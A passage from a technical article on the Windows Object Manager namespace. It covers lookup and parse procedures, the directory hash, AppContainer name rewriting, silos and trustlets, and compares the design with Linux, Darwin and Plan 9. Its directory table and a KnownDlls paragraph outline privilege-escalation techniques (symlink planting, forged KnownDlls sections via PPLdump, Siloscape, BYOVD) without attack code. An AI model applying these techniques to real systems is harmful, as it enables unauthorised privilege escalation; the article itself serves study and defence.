&lt;p&gt;&lt;code&gt;CmpParseKey&lt;/code&gt; is the parse procedure for the &lt;code&gt;Key&lt;/code&gt; type. When the walker reaches &lt;code&gt;\REGISTRY&lt;/code&gt; and is asked to continue with &lt;code&gt;\MACHINE\Software\Microsoft\Windows&lt;/code&gt;, the Configuration Manager takes over and walks the in-memory hive structures.&lt;/p&gt;
&lt;p&gt;The structural consequence is profound. Every named file in Windows is, technically, a leaf in the Object Manager namespace. NTFS, ReFS, ExFAT, and the registry are not separate naming systems; they are parse-procedure callbacks that hand &lt;code&gt;FILE_OBJECT&lt;/code&gt; or &lt;code&gt;KEY&lt;/code&gt; bodies back to the OM.&lt;/p&gt;

sequenceDiagram
    participant User as User Process
    participant OM as ObpLookupObjectName
    participant Dir as \GLOBAL?? OBJECT_DIRECTORY
    participant Dev as \Device\HarddiskVolume1 (Device type)
    participant Drv as NTFS Driver
    User-&amp;gt;&amp;gt;OM: NtCreateFile(&quot;\??\C:\Users\me\file.txt&quot;)
    OM-&amp;gt;&amp;gt;OM: rewrite \??\ -&amp;gt; \Sessions\\DosDevices\
    OM-&amp;gt;&amp;gt;Dir: lookup &quot;C:&quot;
    Dir--&amp;gt;&amp;gt;OM: SymbolicLink -&amp;gt; \Device\HarddiskVolume1
    OM-&amp;gt;&amp;gt;OM: substitute, re-enter walk
    OM-&amp;gt;&amp;gt;Dev: lookup \Device\HarddiskVolume1
    Dev--&amp;gt;&amp;gt;OM: type=Device, has ParseProcedure
    OM-&amp;gt;&amp;gt;Drv: IopParseDevice with &quot;\Users\me\file.txt&quot;
    Drv-&amp;gt;&amp;gt;Drv: IRP_MJ_CREATE: walk MFT, find file
    Drv--&amp;gt;&amp;gt;OM: FILE_OBJECT
    OM--&amp;gt;&amp;gt;User: HANDLE
&lt;h3&gt;5.4 The 37-bucket directory hash&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;OBJECT_DIRECTORY&lt;/code&gt; is a 37-bucket open-hash table. The hash function is &lt;code&gt;RtlHashUnicodeString&lt;/code&gt;, applied to each component name. Thirty-seven was the prime Cutler picked in 1993; the constant has not changed in thirty-three years. The folk-knowledge corroboration is in Chapter 8 of &lt;em&gt;Windows Internals 7th Edition Part 1&lt;/em&gt; and in Forshaw&apos;s &lt;em&gt;Windows Security Internals&lt;/em&gt; Chapter 8; Microsoft has never published a Learn-hosted spec for the constant [@nostarch-windows-security-internals].&lt;/p&gt;

The 37-bucket open-hash table (`nt!_OBJECT_DIRECTORY`) that lives at every interior node of the Object Manager tree. Keys are `UNICODE_STRING` component names; the hash is `RtlHashUnicodeString` modulo 37. Each bucket is a linked list of `OBJECT_DIRECTORY_ENTRY` records that point at the next-level `OBJECT_HEADER`. Reading the tree requires `Directory`-`TRAVERSE` rights on the parent.
&lt;p&gt;The 37-bucket constant from 1993 has not changed in thirty-three years. On a 2026 Windows 11 25H2 box with several hundred MSIX packages each owning an &lt;code&gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; subtree, average bucket chains run several entries deep. Collision pressure on the constant is the open problem returned to in Section 9.&lt;/p&gt;
&lt;h3&gt;5.5 The lowbox redirect inside ObpLookupObjectName&lt;/h3&gt;
&lt;p&gt;This is the subsection that earns the second aha moment of the article.&lt;/p&gt;
&lt;p&gt;When the calling thread&apos;s primary token is a lowbox token, &lt;code&gt;ObpLookupObjectName&lt;/code&gt; consults the token&apos;s &lt;code&gt;AppContainerNumber&lt;/code&gt; and package SID &lt;em&gt;before&lt;/em&gt; it begins the walk. Lookups that would otherwise resolve into &lt;code&gt;\BaseNamedObjects&lt;/code&gt; or &lt;code&gt;\RPC Control&lt;/code&gt; are rewritten into &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt;. The rewrite happens transparently to the user-mode Win32 caller, which still thinks it asked for &lt;code&gt;\BaseNamedObjects\X&lt;/code&gt;.&lt;/p&gt;

A specialised token type produced by `NtCreateLowBoxToken` that carries a `TOKEN_APPCONTAINER_INFORMATION` block (with a package SID `S-1-15-2-...` and an `AppContainerNumber`). When a process runs under a lowbox token, `ObpLookupObjectName` rewrites every named-object lookup into the per-package directory `\Sessions\\AppContainerNamedObjects\\` before path walking begins.

The user-facing brand for the lowbox-token mechanism. Every UWP / MSIX / Windows Store app runs in an AppContainer. The Windows API surface is unchanged for the app; the Object Manager rewrites every named-object name into a per-package subtree, gating cross-package coordination at the namespace layer. The Microsoft Learn page describes this as &quot;Sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes&quot; [@ms-appcontainer-isolation].
&lt;p&gt;The aha moment is structural. AppContainer is not a &lt;em&gt;containment&lt;/em&gt; mechanism the way you might first picture it. It is a &lt;em&gt;name-translation&lt;/em&gt; mechanism. The lowbox token tells the kernel which directory to rewrite every name into; the sandbox is, at root, a hash-table indirection inside the kernel&apos;s path-walk function. The Edge renderer process cannot name &lt;code&gt;\BaseNamedObjects\GlobalEvent_Foo&lt;/code&gt; because the kernel rewrites that name into &lt;code&gt;\Sessions\1\AppContainerNamedObjects\S-1-15-2-...\Global\GlobalEvent_Foo&lt;/code&gt; before lookup even begins. The &quot;sandbox&quot; is a hash-table redirect.&lt;/p&gt;
&lt;h3&gt;5.6 The Silo OBJECT_TYPE and silo-scoped views&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;Silo&lt;/code&gt; is itself a registered &lt;code&gt;OBJECT_TYPE&lt;/code&gt;. Each silo instance carries a silo-scoped &lt;code&gt;RootDirectory&lt;/code&gt;, &lt;code&gt;DosDevicesDirectory&lt;/code&gt;, and &lt;code&gt;ServerSiloGlobals&lt;/code&gt; (with the silo&apos;s own registry-hive root and per-silo &lt;code&gt;BaseNamedObjects&lt;/code&gt; root). &lt;code&gt;PsAttachSiloToCurrentThread&lt;/code&gt; switches the thread&apos;s namespace view; once attached, every Object Manager lookup runs through the silo&apos;s roots instead of the host&apos;s. Job objects, which provide the cgroups-equivalent resource-accounting substrate, are the underlying primitive the Silo type extends [@ms-job-objects]. The structural design history is in Prizmant&apos;s reverse-engineering writeup [@unit42-rev-eng-windows-containers].&lt;/p&gt;

A specialised `Job`-derived kernel object (`OBJECT_TYPE` Silo) introduced in Windows Server 2016 that carries silo-scoped `RootDirectory`, `DosDevicesDirectory`, and `ServerSiloGlobals` fields. A thread attached to a silo via `PsAttachSiloToCurrentThread` sees the silo&apos;s namespace as its root; the silo&apos;s `\GLOBAL??\C:` resolves to the silo&apos;s `\Device\HarddiskVolume*`, which is a different `Device` object from the host&apos;s. Server Silo is the substrate underneath Windows Server Containers and WSL1.
&lt;h3&gt;5.7 The Secure Kernel&apos;s parallel namespace&lt;/h3&gt;
&lt;p&gt;Inside VTL1, the Secure Kernel maintains a separate Object Manager tree with its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel cannot enumerate this tree; the only cross-VTL traffic is the narrow ALPC interface each trustlet publishes. Ionescu&apos;s BH2015 inventory (Trustlet IDs 0 through 3 at ship, growing in subsequent releases) is the canonical primary [@ionescu-bh2015-pdf].&lt;/p&gt;

A user-mode process running in Isolated User Mode under the VTL1 Secure Kernel. Each trustlet is signed with both the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6) and the IUM EKU (1.3.6.1.4.1.311.10.3.37), runs at Signature Level 12, and is reachable from VTL0 only through narrow ALPC ports. LSAISO.EXE (Credential Guard), VMSP.EXE (virtual TPM host), and the vTPM provisioning trustlet are the inbox examples.
&lt;h3&gt;5.8 The handle table&lt;/h3&gt;
&lt;p&gt;The namespace is the &lt;em&gt;name&lt;/em&gt; side; the per-process &lt;code&gt;HANDLE_TABLE&lt;/code&gt; is the &lt;em&gt;access&lt;/em&gt; side. Once a handle exists in a process, no name lookup happens on subsequent use; the kernel dereferences the handle through a three-level radix tree indexed by the 32-bit handle value, lands on an &lt;code&gt;OBJECT_HEADER&lt;/code&gt;, and operates on the body. This is why &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; fires on handle &lt;em&gt;creation&lt;/em&gt; and &lt;em&gt;duplication&lt;/em&gt; rather than on every use, and why an inherited handle bypasses the callback entirely. The structural consequence -- that the Object Manager is the gate at name resolution but not at every operation -- comes back in Section 8.&lt;/p&gt;
&lt;p&gt;Now you know the data structure. But what does the actual tree look like in 2026? What does &lt;code&gt;\&lt;/code&gt; contain on a Windows 11 25H2 box, and which security boundary lives in each top-level directory?&lt;/p&gt;
&lt;h2&gt;6. The 2026 top-level directory atlas&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;WinObj.exe&lt;/code&gt; as administrator on a Windows 11 25H2 machine and the root directory at &lt;code&gt;\&lt;/code&gt; carries roughly twenty entries. The table below catalogues the load-bearing ones. Each row names the directory, the security boundary it physically realises, and a representative exploit class that has been thrown at it. The driver kit&apos;s Object Directories reference [@ms-object-directories] is Microsoft&apos;s canonical inventory.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Top-level directory&lt;/th&gt;
&lt;th&gt;What it contains&lt;/th&gt;
&lt;th&gt;Which boundary it enforces&lt;/th&gt;
&lt;th&gt;Exploit class&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\ObjectTypes&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The ~75 &lt;code&gt;OBJECT_TYPE&lt;/code&gt; singletons (&lt;code&gt;Process&lt;/code&gt;, &lt;code&gt;Thread&lt;/code&gt;, &lt;code&gt;Section&lt;/code&gt;, &lt;code&gt;Key&lt;/code&gt;, &lt;code&gt;File&lt;/code&gt;, &lt;code&gt;Token&lt;/code&gt;, &lt;code&gt;Job&lt;/code&gt;, &lt;code&gt;Silo&lt;/code&gt;, etc.)&lt;/td&gt;
&lt;td&gt;Meta -- the type registry the rest of the namespace depends on&lt;/td&gt;
&lt;td&gt;Type confusion (mitigated by &lt;code&gt;ObHeaderCookie&lt;/code&gt; since Windows 10 1709)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Device&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Driver-published device objects (&lt;code&gt;\Device\HarddiskVolume*&lt;/code&gt;, &lt;code&gt;\Device\Tcp&lt;/code&gt;, &lt;code&gt;\Device\Tpm&lt;/code&gt;, &lt;code&gt;\Device\NamedPipe&lt;/code&gt;, &lt;code&gt;\Device\Mailslot&lt;/code&gt;, &lt;code&gt;\Device\Vmbus&lt;/code&gt;, &lt;code&gt;\Device\KsecDD&lt;/code&gt;, &lt;code&gt;\Device\CNG&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;The I/O Manager&apos;s surface; each driver&apos;s parse procedure consumes residual paths&lt;/td&gt;
&lt;td&gt;Bait-and-switch on &lt;code&gt;\Device&lt;/code&gt; (a low-privilege user redirects a privileged opener through a planted symbolic link)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Driver&lt;/code&gt;, &lt;code&gt;\FileSystem&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Loaded &lt;code&gt;DRIVER_OBJECT&lt;/code&gt; registries&lt;/td&gt;
&lt;td&gt;KMCS / HVCI driver-load gate&lt;/td&gt;
&lt;td&gt;Vulnerable signed-driver class (BYOVD)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\GLOBAL??&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The machine-wide DosDevices view -- where &lt;code&gt;C:&lt;/code&gt; and &lt;code&gt;D:&lt;/code&gt; are symlinks to &lt;code&gt;\Device\HarddiskVolume*&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cross-session drive-letter map&lt;/td&gt;
&lt;td&gt;Symlink redirect across session boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\??&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The per-session DosDevices alias, falling through to &lt;code&gt;\GLOBAL??&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Session-scoped drive-letter map&lt;/td&gt;
&lt;td&gt;The HackSys / CVE-2023-35359 worked example: a low-privilege caller plants a &lt;code&gt;DefineDosDevice&lt;/code&gt; remapping that survives into the impersonation-time &lt;code&gt;\??&lt;/code&gt; view, and the SYSTEM-side activation-context resolver opens the redirected path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\BaseNamedObjects&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The global / &lt;code&gt;Global\&lt;/code&gt;-prefixed-only BNO&lt;/td&gt;
&lt;td&gt;Cross-session named-object visibility&lt;/td&gt;
&lt;td&gt;Pre-Vista squatting class (closed by Generation 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-session subtrees (BNO, DosDevices, WindowStations, AppContainerNamedObjects)&lt;/td&gt;
&lt;td&gt;Session boundary (Generation 2)&lt;/td&gt;
&lt;td&gt;Shatter attacks (closed by Generation 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-package UWP / MSIX lowbox namespace&lt;/td&gt;
&lt;td&gt;AppContainer / lowbox boundary (Generation 3)&lt;/td&gt;
&lt;td&gt;Forshaw P0 Issue 1550 arbitrary-directory creation race&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\RPC Control&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Every named LRPC ALPC port (every COM call lands here)&lt;/td&gt;
&lt;td&gt;RPC endpoint visibility&lt;/td&gt;
&lt;td&gt;Endpoint squatting against named LRPC ports&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\KnownDlls&lt;/code&gt;, &lt;code&gt;\KnownDlls32&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mapped &lt;code&gt;Section&lt;/code&gt; objects for system DLLs&lt;/td&gt;
&lt;td&gt;Loader supply-chain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DefineDosDevice&lt;/code&gt; + &lt;code&gt;\??&lt;/code&gt; symlink-plant trick (closed in NTDLL July 2022, build 19044.1826)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\KernelObjects&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;System-defined events (&lt;code&gt;LowMemoryCondition&lt;/code&gt;, &lt;code&gt;HighMemoryCondition&lt;/code&gt;, etc.)&lt;/td&gt;
&lt;td&gt;Kernel-internal visibility&lt;/td&gt;
&lt;td&gt;None public&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Callback&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;System-defined &lt;code&gt;Callback&lt;/code&gt; objects (&lt;code&gt;ExCallback&lt;/code&gt; slots drivers register against)&lt;/td&gt;
&lt;td&gt;Kernel API extension surface&lt;/td&gt;
&lt;td&gt;Driver-callback abuse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Security&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;LSA-private endpoints&lt;/td&gt;
&lt;td&gt;LSA / authentication isolation&lt;/td&gt;
&lt;td&gt;Credential-theft (the LSAISO trustlet via Generation 4)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Windows&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;BNO-redirect surface and &lt;code&gt;SharedSection&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Win32 subsystem shared state&lt;/td&gt;
&lt;td&gt;Cross-session Win32 state leakage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\Silos\&amp;lt;id&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-container silo subroots on Server SKUs&lt;/td&gt;
&lt;td&gt;Server Silo boundary (Generation 5)&lt;/td&gt;
&lt;td&gt;Siloscape -- symlink retarget out of the silo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\BNOLINKS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The boundary-keyed private-namespace index&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CreatePrivateNamespace&lt;/code&gt; cross-session/cross-package IPC&lt;/td&gt;
&lt;td&gt;None public; the directory itself is RE-derived&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    subgraph EdgeRenderer[&quot;Microsoft Edge Renderer (lowbox token)&quot;]
        K32[&quot;CreateMutexW(L&apos;Global\\Foo&apos;)&quot;]
    end
    K32 --&amp;gt;|&quot;NtCreateMutant, OBJECT_ATTRIBUTES&quot;| OB
    subgraph KernelOb[&quot;ObpLookupObjectName&quot;]
        OB[&quot;Read caller token&lt;br /&gt;token.AppContainerNumber&lt;br /&gt;token.PackageSid&quot;]
        OB --&amp;gt;|&quot;rewrite name&quot;| RW[&quot;Rewrite &apos;\\BaseNamedObjects\\Global\\Foo&apos;&lt;br /&gt;to&lt;br /&gt;&apos;\\Sessions\\1\\AppContainerNamedObjects\\&lt;br /&gt;S-1-15-2-...\\Global\\Foo&apos;&quot;]
        RW --&amp;gt; WALK[&quot;walk the rewritten path&quot;]
    end
    WALK --&amp;gt; Dir[&quot;\\Sessions\\1\\AppContainerNamedObjects\\&lt;br /&gt;S-1-15-2-...\\Global\\&lt;br /&gt;(per-package OBJECT_DIRECTORY,&lt;br /&gt;DACL allows only package SID)&quot;]
&lt;p&gt;The &lt;code&gt;\BNOLINKS&lt;/code&gt; directory deserves a separate paragraph because it is not on Microsoft Learn. &lt;code&gt;NtCreatePrivateNamespace&lt;/code&gt; is the kernel-side syscall behind the Win32 &lt;code&gt;CreatePrivateNamespace&lt;/code&gt; API [@ms-createprivatenamespacew]; the caller passes a boundary descriptor built by &lt;code&gt;CreateBoundaryDescriptor&lt;/code&gt; [@ms-createboundarydescriptorw] plus one or more SIDs added via &lt;code&gt;AddSIDToBoundaryDescriptor&lt;/code&gt; [@ms-addsidtoboundarydescriptor]. The kernel materialises one &lt;code&gt;\BNOLINKS&lt;/code&gt; entry per &lt;code&gt;(alias_prefix, boundary_descriptor_hash)&lt;/code&gt; tuple; two callers that pass the same &lt;code&gt;lpAliasPrefix&lt;/code&gt; but different boundary descriptors land on different directories. The native signature is documented in the PHNT-derived NtDoc mirror [@ntdoc-ntcreateprivatenamespace], and the &lt;code&gt;OBJECT_BOUNDARY_DESCRIPTOR&lt;/code&gt; structure layout is at ntdoc.m417z.com/object_boundary_descriptor [@ntdoc-object-boundary-descriptor]. The Win32 Object Namespaces overview [@ms-object-namespaces] is Microsoft&apos;s only published user-mode reference; the &lt;code&gt;\BNOLINKS&lt;/code&gt; directory name itself is reverse-engineering-derived.The &lt;code&gt;\BNOLINKS&lt;/code&gt; directory is documented only through reverse engineering of &lt;code&gt;ntoskrnl.exe&lt;/code&gt; -- via Forshaw&apos;s NtObjectManager and System Informer&apos;s PHNT headers -- not on Microsoft Learn. The user-mode API surface (&lt;code&gt;CreatePrivateNamespace&lt;/code&gt;, &lt;code&gt;CreateBoundaryDescriptor&lt;/code&gt;, &lt;code&gt;AddSIDToBoundaryDescriptor&lt;/code&gt;) is fully documented. The provenance gap is worth flagging when you cite the directory by name.The &lt;code&gt;\KnownDlls&lt;/code&gt; LPE class was, for a decade, the canonical example of how a DACL plus loader-side validation could lock down a supply-chain anchor. Forshaw&apos;s August 2018 P0 post first sketched a &lt;code&gt;DefineDosDevice&lt;/code&gt; + &lt;code&gt;\??&lt;/code&gt; symlink-plant chain that could land a forged &lt;code&gt;Section&lt;/code&gt; object into &lt;code&gt;\KnownDlls&lt;/code&gt;; Clement Labro (itm4n) implemented the attack as the PPLdump tool and wrote companion posts on both itm4n.github.io [@itm4n-lsass-runasppl] and the SCRT team blog [@blog-scrt-bypassing-lsa-protection-in-userland]. The class was closed in NTDLL by Windows 10 21H2 build 19044.1826; itm4n confirms the patch in &lt;em&gt;The End of PPLdump&lt;/em&gt; [@itm4n-the-end-of-ppldump]: &quot;A patch in NTDLL now prevents PPLs from loading Known DLLs.&quot;&lt;/p&gt;
&lt;p&gt;{`
const MAX_DIRECTORY_BUCKETS = 37;&lt;/p&gt;
&lt;p&gt;function rtlHashUnicodeString(name) {
  let h = 0;
  for (const ch of name.toUpperCase()) {
    h = (h * 31 + ch.charCodeAt(0)) &amp;gt;&amp;gt;&amp;gt; 0;
  }
  return h % MAX_DIRECTORY_BUCKETS;
}&lt;/p&gt;
&lt;p&gt;function makeDir() {
  return { buckets: Array(MAX_DIRECTORY_BUCKETS).fill(null).map(() =&amp;gt; []) };
}&lt;/p&gt;
&lt;p&gt;function addChild(dir, name, child) {
  dir.buckets[rtlHashUnicodeString(name)].push({ name, child });
}&lt;/p&gt;
&lt;p&gt;function lookupObjectName(path, root) {
  const components = path.split(&apos;\\&apos;).filter(Boolean);
  let cursor = root;
  for (const comp of components) {
    const bucket = rtlHashUnicodeString(comp);
    const chain = cursor.buckets[bucket];
    const hit = chain.find(e =&amp;gt; e.name.toUpperCase() === comp.toUpperCase());
    console.log(`lookup &apos;${comp}&apos; -&amp;gt; bucket ${bucket}, chain length ${chain.length}, ${hit ? &apos;HIT&apos; : &apos;MISS&apos;}`);
    if (!hit) return null;
    if (hit.child.parseProcedure) {
      const rest = &apos;\\&apos; + components.slice(components.indexOf(comp) + 1).join(&apos;\\&apos;);
      console.log(`  parse-procedure handoff for type &apos;${hit.child.type}&apos;, residual=&apos;${rest}&apos;`);
      return { handedOff: hit.child, residual: rest };
    }
    cursor = hit.child;
  }
  return cursor;
}&lt;/p&gt;
&lt;p&gt;const root = makeDir();
const device = makeDir();
device.parseProcedure = true; device.type = &apos;Device&apos;;
const sessions = makeDir();
addChild(root, &apos;Device&apos;, device);
addChild(root, &apos;Sessions&apos;, sessions);
addChild(root, &apos;BaseNamedObjects&apos;, makeDir());&lt;/p&gt;
&lt;p&gt;lookupObjectName(&apos;\\Device\\HarddiskVolume1\\Users\\me\\file.txt&apos;, root);
`}&lt;/p&gt;
&lt;p&gt;The walk is the algorithm. The 37 is the bucket count Cutler picked in 1993. The parse-procedure handoff is where the I/O Manager and the Configuration Manager and dozens of other subsystems insert themselves into the tree. Now turn the question around: Windows bet on one tree. What did the kernels that did not bet on one tree do, and why?&lt;/p&gt;
&lt;h2&gt;7. How other kernels name kernel objects&lt;/h2&gt;
&lt;p&gt;Three kernels, three different bets. Linux took the namespace and &lt;em&gt;split it into per-resource-class clones&lt;/em&gt; -- one for mounts, one for PIDs, one for IPC, one for the network stack, one for users, one for hostnames, one for cgroups, one for time -- and never built a unified tree. macOS / Darwin gave each task its own &lt;em&gt;Mach port-right namespace&lt;/em&gt; and let &lt;code&gt;launchd&lt;/code&gt; broker named-service lookups. Plan 9 from Bell Labs was the academic ancestor of &quot;every named OS resource is a filesystem path,&quot; and the design Cutler imported into NT.&lt;/p&gt;
&lt;h3&gt;7.1 Linux: per-resource namespaces&lt;/h3&gt;
&lt;p&gt;Linux ships eight namespace types, each governed by a &lt;code&gt;CLONE_NEW*&lt;/code&gt; flag passed to &lt;code&gt;clone()&lt;/code&gt;, &lt;code&gt;unshare()&lt;/code&gt;, or &lt;code&gt;setns()&lt;/code&gt;: mount, PID, network, IPC, user, UTS, cgroup, and time. The &lt;code&gt;namespaces(7)&lt;/code&gt; man page is precise: &quot;A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource&quot; [@man7-namespaces]. Docker, containerd, runc, Kubernetes pods, LXC, and systemd-nspawn all compose these eight flags into a Linux container.&lt;/p&gt;
&lt;p&gt;The strength of the Linux design is per-class composability. A process can be in a fresh mount namespace, a fresh PID namespace, and the host&apos;s network namespace, all at once. The weakness is the absence of a unified type registry: Linux has no equivalent of &lt;code&gt;\ObjectTypes&lt;/code&gt;, no equivalent of the &lt;code&gt;OBJECT_HEADER&lt;/code&gt; reference counting that the kernel applies uniformly to every named object. Each resource class has its own lookup function, its own permission model, and its own ownership story. A bug in any one of them is bounded to that one resource class but is also not shared mitigation across the others.&lt;/p&gt;
&lt;h3&gt;7.2 macOS / Darwin: Mach ports and the bootstrap server&lt;/h3&gt;
&lt;p&gt;Darwin&apos;s kernel-object naming is capability-style. Apple&apos;s archive documentation describes the model directly: &quot;each task consists of a virtual address space, a port right namespace, and one or more threads&quot; [@apple-mach-kernel]. Tasks send messages by holding a &lt;em&gt;port right&lt;/em&gt; -- a per-task index into a kernel-managed table of Mach ports. There is no single hierarchical namespace; ports are sent over Mach messages, and &lt;code&gt;launchd&lt;/code&gt; operates as the bootstrap-server name broker for services that need a stable rendezvous. A separate I/O Registry tree carries device objects.&lt;/p&gt;
&lt;p&gt;The strength of the Mach design is that capabilities cannot be forged; you cannot synthesise a port right out of a string the way you can synthesise a path string under Windows. The weakness is the split namespace: device objects live in the I/O Registry, services live behind &lt;code&gt;launchd&lt;/code&gt;, and the kernel itself has no equivalent of &lt;code&gt;\BaseNamedObjects&lt;/code&gt; as a one-stop shop.&lt;/p&gt;
&lt;h3&gt;7.3 Plan 9 from Bell Labs&lt;/h3&gt;
&lt;p&gt;Plan 9 is the design lineage Cutler imported. In Plan 9, every named operating-system resource -- including processes, network connections, devices, and the window system -- surfaces as a path served over 9P. The single hierarchical namespace was the central claim. Plan 9 never reached commercial scale, but its design idea reached production in three places: NT (1993, via Cutler), Linux&apos;s /proc, /sys, and FUSE (the 1990s onward), and the various capability-OS research projects (KeyKOS, EROS, seL4) that took the lessons in a different direction.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Granularity&lt;/th&gt;
&lt;th&gt;Enforcement point&lt;/th&gt;
&lt;th&gt;Structural / opt-in&lt;/th&gt;
&lt;th&gt;Bypass by privilege&lt;/th&gt;
&lt;th&gt;Inheritance gap&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Per-Session (NT)&lt;/td&gt;
&lt;td&gt;Logon session&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ObpLookupObjectName&lt;/code&gt; + DACL&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeDebugPrivilege&lt;/code&gt; short-circuit&lt;/td&gt;
&lt;td&gt;Inherited handles cross sessions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppContainer Lowbox (NT)&lt;/td&gt;
&lt;td&gt;Package SID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ObpLookupObjectName&lt;/code&gt; rewrite&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;TCB privileges only&lt;/td&gt;
&lt;td&gt;Brokered handles enter&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Server Silo (NT)&lt;/td&gt;
&lt;td&gt;Container&lt;/td&gt;
&lt;td&gt;Process-&amp;gt;Silo indirection&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;KMCS-signed driver&lt;/td&gt;
&lt;td&gt;Host handles cross silos&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VBS / IUM Trustlet (NT)&lt;/td&gt;
&lt;td&gt;Trust level (VTL)&lt;/td&gt;
&lt;td&gt;Hypervisor&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;Hypervisor compromise&lt;/td&gt;
&lt;td&gt;Cross-VTL ALPC only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mandatory Integrity Control (NT)&lt;/td&gt;
&lt;td&gt;IL band&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeAccessCheckByType&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Opt-in (per-object SACL)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeRelabelPrivilege&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Inherited handles bypass&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ObRegisterCallbacks&lt;/code&gt; (NT)&lt;/td&gt;
&lt;td&gt;Per-type, per-driver&lt;/td&gt;
&lt;td&gt;Object Manager pre-op callback&lt;/td&gt;
&lt;td&gt;Mediation, not partition&lt;/td&gt;
&lt;td&gt;KMCS-signed driver&lt;/td&gt;
&lt;td&gt;Inheritance bypasses callback&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Private Namespace (NT)&lt;/td&gt;
&lt;td&gt;Boundary SID-list&lt;/td&gt;
&lt;td&gt;&lt;code&gt;NtCreatePrivateNamespace&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;All SIDs in caller&apos;s token&lt;/td&gt;
&lt;td&gt;Boundary-keyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
